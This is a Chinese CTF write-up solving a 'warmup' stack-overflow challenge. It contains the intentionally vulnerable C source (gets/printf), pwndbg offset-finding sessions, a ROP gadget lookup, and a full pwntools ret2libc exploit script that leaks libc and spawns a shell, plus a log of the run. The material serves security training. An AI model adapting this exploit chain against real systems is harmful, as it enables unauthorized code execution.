网络安全我来了
网络安全我来了

从零开始做题:逆向 ret2libc warmup

1.题目信息

warmup.c

//gcc -fno-stack-protector -no-pie -z execstack warmup.c -o warmup
#include 

void init_proc(){
	setbuf(stdout, NULL);
	setbuf(stdin, NULL);
	setbuf(stderr, NULL);
}

int main(void) {
	char buf[0x100];
	init_proc();
	puts("Hello CTF Players!\nThis is a warmup challenge for pwnable.\nWe provide some hints for beginners spawning a shell to get the flag.\n\n1.This binary has no SSP(Stack Smash Protection).So you can get control of instruction pointer with stack overflow.\n2.NX-bit is disabled. You can run your shellcode easily.\n3.PIE(Position Independent Executable) is also disabled. Some memory addresses are fixed by default.\n If you get stuck, we recommend you to search about ROP and x64-shellcode.\n Please pwn me:)");
	gets(buf);
	printf(buf);
	return 0;
}

使用如下命令编译成可执行程序

holyeyes@ubuntu:~/Re/7$ gcc -fno-stack-protector -no-pie -z execstack warmup.c -o warmup 

2.题目分析

root@pwn_test1604:/ctf/work/7# checksec ./warmup                                                                                                                                                                   
[*] '/ctf/work/7/warmup'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
root@pwn_test1604:/ctf/work/7# 
root@pwn_test1604:/ctf/work/7# gdb ./warmup
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./warmup...(no debugging symbols found)...done.
pwndbg> cyclic 1000
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

2.1 找到需要填充的数值264

 

root@pwn_test1604:/ctf/work/7# gdb ./warmup
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./warmup...(no debugging symbols found)...done.
pwndbg> cyclic 1000
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
pwndbg> r
Starting program: /ctf/work/7/warmup 
Hello CTF Players!
This is a warmup challenge for pwnable.
We provide some hints for beginners spawning a shell to get the flag.

1.This binary has no SSP(Stack Smash Protection).So you can get control of instruction pointer with stack overflow.
2.NX-bit is disabled. You can run your shellcode easily.
3.PIE(Position Independent Executable) is also disabled. Some memory addresses are fixed by default.
 If you get stuck, we recommend you to search about ROP and x64-shellcode.
 Please pwn me:)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400746 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x0
 RCX  0x7ffff7b042c0 (__write_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x7ffff7dd3780 (_IO_stdfile_1_lock) ◂— 0
 RDI  0x1
 RSI  0x7fffffffbe80 ◂— 0x6161616261616161 ('aaaabaaa')
 R8   0x7ffff7fed700 ◂— add    bh, dl /* 0x7ffff7fed700 */
 R9   0x3e8
 R10  0x6a6161776a616176 ('vaajwaaj')
 R11  0x246
 R12  0x4005c0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffe6f0 ◂— 0x6561617665616175 ('uaaevaae')
 R14  0x0
 R15  0x0
 RBP  0x636161706361616f ('oaacpaac')
 RSP  0x7fffffffe618 ◂— 0x6361617263616171 ('qaacraac')
 RIP  0x400746 (main+77) ◂— ret    
──────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────
 ► 0x400746     ret    <0x6361617263616171>










──────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffe618 ◂— 0x6361617263616171 ('qaacraac')
01:0008│      0x7fffffffe620 ◂— 0x6361617463616173 ('saactaac')
02:0010│      0x7fffffffe628 ◂— 0x6361617663616175 ('uaacvaac')
03:0018│      0x7fffffffe630 ◂— 0x6361617863616177 ('waacxaac')
04:0020│      0x7fffffffe638 ◂— 0x6461617a63616179 ('yaaczaad')
05:0028│      0x7fffffffe640 ◂— 0x6461616364616162 ('baadcaad')
06:0030│      0x7fffffffe648 ◂— 0x6461616564616164 ('daadeaad')
07:0038│      0x7fffffffe650 ◂— 0x6461616764616166 ('faadgaad')
────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► f 0           400746 main+77
   f 1 6361617263616171
   f 2 6361617463616173
   f 3 6361617663616175
   f 4 6361617863616177
   f 5 6461617a63616179
   f 6 6461616364616162
   f 7 6461616564616164
   f 8 6461616764616166
   f 9 6461616964616168
   f 10 6461616b6461616a
Program received signal SIGSEGV (fault address 0x0)
pwndbg> cyclic -l qaacraac
[CRITICAL] Subpattern must be 4 bytes
pwndbg> cyclic -l raac
268
pwndbg> cyclic 268
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaac
pwndbg> r
Starting program: /ctf/work/7/warmup 
Hello CTF Players!
This is a warmup challenge for pwnable.
We provide some hints for beginners spawning a shell to get the flag.

1.This binary has no SSP(Stack Smash Protection).So you can get control of instruction pointer with stack overflow.
2.NX-bit is disabled. You can run your shellcode easily.
3.PIE(Position Independent Executable) is also disabled. Some memory addresses are fixed by default.
 If you get stuck, we recommend you to search about ROP and x64-shellcode.
 Please pwn me:)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaactttt
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaactttt
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400746 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x0
 RCX  0x7ffff7b042c0 (__write_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x7ffff7dd3780 (_IO_stdfile_1_lock) ◂— 0
 RDI  0x1
 RSI  0x7fffffffbe80 ◂— 0x6161616261616161 ('aaaabaaa')
 R8   0x7ffff7fed700 ◂— add    bh, dl /* 0x7ffff7fed700 */
 R9   0x110
 R10  0x6361616e6361616d ('maacnaac')
 R11  0x246
 R12  0x4005c0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffe6f0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x636161706361616f ('oaacpaac')
 RSP  0x7fffffffe618 ◂— 'qaactttt'
 RIP  0x400746 (main+77) ◂— ret    
──────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────
 ► 0x400746     ret    <0x7474747463616171>










──────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffe618 ◂— 'qaactttt'
01:0008│      0x7fffffffe620 —▸ 0x7fffffffe600 ◂— 'kaaclaacmaacnaacoaacpaacqaactttt'
02:0010│      0x7fffffffe628 —▸ 0x7fffffffe6f8 —▸ 0x7fffffffe8fc ◂— '/ctf/work/7/warmup'
03:0018│      0x7fffffffe630 ◂— 0x1f7b99608
04:0020│      0x7fffffffe638 —▸ 0x4006f9 (main) ◂— push   rbp
05:0028│      0x7fffffffe640 ◂— 0x0
06:0030│      0x7fffffffe648 ◂— 0xf9119aa85cbaa8e2
07:0038│      0x7fffffffe650 —▸ 0x4005c0 (_start) ◂— xor    ebp, ebp
────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► f 0           400746 main+77
   f 1 7474747463616171
   f 2     7fffffffe600
   f 3     7fffffffe6f8
   f 4        1f7b99608
   f 5           4006f9 main
   f 6                0
Program received signal SIGSEGV (fault address 0x0)
pwndbg> cyclic 264
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaac
pwndbg> r
Starting program: /ctf/work/7/warmup 
Hello CTF Players!
This is a warmup challenge for pwnable.
We provide some hints for beginners spawning a shell to get the flag.

1.This binary has no SSP(Stack Smash Protection).So you can get control of instruction pointer with stack overflow.
2.NX-bit is disabled. You can run your shellcode easily.
3.PIE(Position Independent Executable) is also disabled. Some memory addresses are fixed by default.
 If you get stuck, we recommend you to search about ROP and x64-shellcode.
 Please pwn me:)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaactttttttt
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaactttttttt
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400746 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x0
 RCX  0x7ffff7b042c0 (__write_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x7ffff7dd3780 (_IO_stdfile_1_lock) ◂— 0
 RDI  0x1
 RSI  0x7fffffffbe80 ◂— 0x6161616261616161 ('aaaabaaa')
 R8   0x7ffff7fed700 ◂— add    bh, dl /* 0x7ffff7fed700 */
 R9   0x110
 R10  0x6361616e6361616d ('maacnaac')
 R11  0x246
 R12  0x4005c0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffe6f0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x636161706361616f ('oaacpaac')
 RSP  0x7fffffffe618 ◂— 'tttttttt'
 RIP  0x400746 (main+77) ◂— ret    
──────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────
 ► 0x400746     ret    <0x7474747474747474>










──────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffe618 ◂— 'tttttttt'
01:0008│      0x7fffffffe620 —▸ 0x7fffffffe600 ◂— 'kaaclaacmaacnaacoaacpaactttttttt'
02:0010│      0x7fffffffe628 —▸ 0x7fffffffe6f8 —▸ 0x7fffffffe8fc ◂— '/ctf/work/7/warmup'
03:0018│      0x7fffffffe630 ◂— 0x1f7b99608
04:0020│      0x7fffffffe638 —▸ 0x4006f9 (main) ◂— push   rbp
05:0028│      0x7fffffffe640 ◂— 0x0
06:0030│      0x7fffffffe648 ◂— 0x3c827cafc158bd83
07:0038│      0x7fffffffe650 —▸ 0x4005c0 (_start) ◂— xor    ebp, ebp
────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► f 0           400746 main+77
   f 1 7474747474747474
   f 2     7fffffffe600
   f 3     7fffffffe6f8
   f 4        1f7b99608
   f 5           4006f9 main
   f 6                0
Program received signal SIGSEGV (fault address 0x0)
pwndbg>

2.2找到pop_rdi_ret 的值

root@pwn_test1604:/ctf/work/7# ROPgadget --binary ./warmup --only 'pop|ret' |grep rdi
0x00000000004007b3 : pop rdi ; ret
root@pwn_test1604:/ctf/work/7#

2.3找到main值0x4006f9

从零开始做题:逆向 ret2libc warmup_第1张图片

2.4找到ret值 0x400746

 从零开始做题:逆向 ret2libc warmup_第2张图片

3.解题脚本

3.1只用修改的内容 

pop_rdi_ret = 0x00000000004007b3
main = 0x4006f9
ret = 0x400746

def exploit(p):

	p.recv()
	pl = ''
	pl += 264*'a'
	pl += p64(pop_rdi_ret)+p64(elf.got['puts'])
	pl += p64(elf.plt['puts'])
	pl += p64(main)

	
	p.sendline(pl)

	p.recvuntil(264*'a')
	p.recv(3)
	leak = u64(p.recv(6).ljust(8,'\x00'))
	log.info('leak: '+hex(leak))

	libc = elf.libc
	libc_base = leak-libc.sym['puts']
	log.info('libc_base: '+hex(libc_base))
	system = libc_base + libc.sym['system']
        binsh =  libc_base + libc.search('/bin/sh').next()

	#system = leak-0x31580
	#binsh = leak+0x1334da
	log.info('system: '+hex(system))
	log.info('binsh:'+hex(binsh))

	p.recv()
	pl = ''
	pl += 264*'a'
	pl += p64(pop_rdi_ret)+p64(binsh)
	pl += p64(ret)
	pl += p64(system)
	p.sendline(pl)
	p.interactive()
	return

3.2全部脚本  

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pickle import TRUE
from pwn import *
import sys

context.terminal=["tmux","sp","-h"]
context.log_level='debug'
#context.arch='i386'

DEBUG = 1

LOCAL = True
BIN   ='./warmup'
HOST  ='node5.buuoj.cn'
PORT  =29924




def get_base_address(proc):
	return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)

def debug(bps,_s):
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in bps:
        script += "b *0x%x\n"%(PIE+bp)
    script += _s
    gdb.attach(p,gdbscript=script)

# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

pop_rdi_ret = 0x00000000004007b3
main = 0x4006f9
ret = 0x400746

def exploit(p):

	p.recv()
	pl = ''
	pl += 264*'a'
	pl += p64(pop_rdi_ret)+p64(elf.got['puts'])
	pl += p64(elf.plt['puts'])
	pl += p64(main)

	
	p.sendline(pl)

	p.recvuntil(264*'a')
	p.recv(3)
	leak = u64(p.recv(6).ljust(8,'\x00'))
	log.info('leak: '+hex(leak))

	libc = elf.libc
	libc_base = leak-libc.sym['puts']
	log.info('libc_base: '+hex(libc_base))
	system = libc_base + libc.sym['system']
        binsh =  libc_base + libc.search('/bin/sh').next()

	#system = leak-0x31580
	#binsh = leak+0x1334da
	log.info('system: '+hex(system))
	log.info('binsh:'+hex(binsh))

	p.recv()
	pl = ''
	pl += 264*'a'
	pl += p64(pop_rdi_ret)+p64(binsh)
	pl += p64(ret)
	pl += p64(system)
	p.sendline(pl)
	p.interactive()
	return

if __name__ == "__main__":
	elf = ELF(BIN)
	if len(sys.argv) > 1:
		LOCAL = False
		p = remote(HOST, PORT)
		exploit(p)
	else:
		LOCAL = True
		p = process(BIN)
		log.info('PID: '+ str(proc.pidof(p)[0]))
		# pause
		if DEBUG:
			debug([],"")
		exploit(p)

 3.3 运行本地

 

root@pwn_test1604:/ctf/work/7# python warmup.py                                            │   0x7fb52abaf266 <__read_nocancel+13>    jae    read+73 <0x7fb52abaf299>
[DEBUG] PLT 0x40055c puts                                                                  │    ↓
[DEBUG] PLT 0x40055c puts                                                                  │   0x7fb52abaf299                mov    rcx, qword ptr [rip + 0x2ccbd8]
[DEBUG] PLT 0x400570 setbuf                                                                │   0x7fb52abaf2a0                neg    eax
[DEBUG] PLT 0x400580 printf                                                                │   0x7fb52abaf2a2                mov    dword ptr fs:[rcx], eax
[DEBUG] PLT 0x400590 __libc_start_main                                                     │   0x7fb52abaf2a5                or     rax, 0xffffffffffffffff
[DEBUG] PLT 0x4005a0 gets                                                                  │   0x7fb52abaf2a9                ret    
[DEBUG] PLT 0x4005b0 __gmon_start__                                                        │ 
[*] '/ctf/work/7/warmup'                                                                   │   0x7fb52abaf2aa                         nop    word ptr [rax + rax]
    Arch:     amd64-64-little                                                              │   0x7fb52abaf2b0                  cmp    dword ptr [rip + 0x2d2489], 0 <0x7fb52ae8
    RELRO:    Partial RELRO                                                                │1740>
    Stack:    No canary found                                                              │   0x7fb52abaf2b7                jne    write+25 <0x7fb52abaf2c9>
    NX:       NX disabled                                                                  │    ↓
    PIE:      No PIE (0x400000)                                                            │   0x7fb52abaf2c9               sub    rsp, 8
    RWX:      Has RWX segments                                                             │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[+] Starting local process './warmup': pid 370                                             │00:0000│ rsp  0x7fff632836a8 —▸ 0x7fb52ab325e8 (_IO_file_underflow+328) ◂— cmp    rax, 0
[*] PID: 370                                                                               │01:0008│      0x7fff632836b0 —▸ 0x7fff632838e0 ◂— 0x1
[DEBUG] Wrote gdb script to '/tmp/pwnvI4GMo.gdb'                                           │02:0010│      0x7fff632836b8 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
    file ./warmup                                                                          │rax] /* 0xfbad208b */
    handle SIGALRM ignore                                                                  │03:0018│      0x7fff632836c0 —▸ 0x7fff63283700 ◂— 0x340
    set $_base = 0x400000                                                                  │04:0020│      0x7fff632836c8 —▸ 0x7fb52ab3360e (_IO_default_uflow+14) ◂— cmp    eax, -1
[*] running in new terminal: /usr/bin/gdb -q  "./warmup" 370 -x "/tmp/pwnvI4GMo.gdb"       │05:0028│      0x7fff632836d0 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q  "./warmup│rax] /* 0xfbad208b */
" 370 -x "/tmp/pwnvI4GMo.gdb"']                                                            │06:0030│      0x7fff632836d8 —▸ 0x7fb52ab26ee5 (gets+357) ◂— cmp    eax, -1
[+] Waiting for debugger: Done                                                             │07:0038│      0x7fff632836e0 ◂— 0x0
[DEBUG] Received 0x1f0 bytes:                                                              │──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
    'Hello CTF Players!\n'                                                                 │ ► f 0     7fb52abaf260 __read_nocancel+7
    'This is a warmup challenge for pwnable.\n'                                            │   f 1     7fb52ab325e8 _IO_file_underflow+328
    'We provide some hints for beginners spawning a shell to get the flag.\n'              │   f 2     7fb52ab3360e _IO_default_uflow+14
    '\n'                                                                                   │   f 3     7fb52ab26ee5 gets+357
    '1.This binary has no SSP(Stack Smash Protection).So you can get control of instruction│   f 4           40072c main+51
 pointer with stack overflow.\n'                                                           │   f 5     7fb52aad8830 __libc_start_main+240
    '2.NX-bit is disabled. You can run your shellcode easily.\n'                           │pwndbg> c
    '3.PIE(Position Independent Executable) is also disabled. Some memory addresses are fix│Continuing.
ed by default.\n'                                                                          │[New process 383]
    ' If you get stuck, we recommend you to search about ROP and x64-shellcode.\n'         │process 383 is executing new program: /bin/dash
    ' Please pwn me:)\n'                                                                   │[New process 385]
[DEBUG] Sent 0x129 bytes:                                                                  │process 385 is executing new program: /bin/dash
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│    │ls
    *                                                                                      │[New process 386]
    00000100  61 61 61 61  61 61 61 61  b3 07 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│    │process 386 is executing new program: /bin/ls
    00000110  18 10 60 00  00 00 00 00  5c 05 40 00  00 00 00 00  │··`·│····│\·@·│····│    │[Thread debugging using libthread_db enabled]
    00000120  f9 06 40 00  00 00 00 00  0a                        │··@·│····│·│            │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    00000129                                                                               │[Inferior 4 (process 386) exited normally]
[DEBUG] Received 0x302 bytes:                                                              │pwndbg> ls
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│    │setting.sh  warmup  warmup.c  warmup.py
    *                                                                                      │pwndbg> 
    00000100  61 61 61 61  61 61 61 61  b3 07 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│    │   0x7fb52abaf266 <__read_nocancel+13>    jae    read+73 <0x7fb52abaf299>
    00000110  18 10 60 00  00 00 00 00  5c 05 40 00  00 00 00 00  │··`·│····│\·@·│····│    │    ↓
    00000120  f9 06 40 00  00 00 00 00  0a                        │··@·│····│·│            │   0x7fb52abaf299                mov    rcx, qword ptr [rip + 0x2ccbd8]
    00000129                                                                               │   0x7fb52abaf2a0                neg    eax
[DEBUG] Received 0x302 bytes:                                                              │   0x7fb52abaf2a2                mov    dword ptr fs:[rcx], eax
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│    │   0x7fb52abaf2a5                or     rax, 0xffffffffffffffff
    *                                                                                      │   0x7fb52abaf2a9                ret    
    00000100  61 61 61 61  61 61 61 61  b3 07 40 90  76 b2 2a b5  │aaaa│aaaa│··@·│v·*·│    │ 
    00000110  7f 0a 48 65  6c 6c 6f 20  43 54 46 20  50 6c 61 79  │··He│llo │CTF │Play│    │   0x7fb52abaf2aa                         nop    word ptr [rax + rax]
    00000120  65 72 73 21  0a 54 68 69  73 20 69 73  20 61 20 77  │ers!│·Thi│s is│ a w│    │   0x7fb52abaf2b0                  cmp    dword ptr [rip + 0x2d2489], 0 <0x7fb52ae8
    00000130  61 72 6d 75  70 20 63 68  61 6c 6c 65  6e 67 65 20  │armu│p ch│alle│nge │    │1740>
    00000140  66 6f 72 20  70 77 6e 61  62 6c 65 2e  0a 57 65 20  │for │pwna│ble.│·We │    │   0x7fb52abaf2b7                jne    write+25 <0x7fb52abaf2c9>
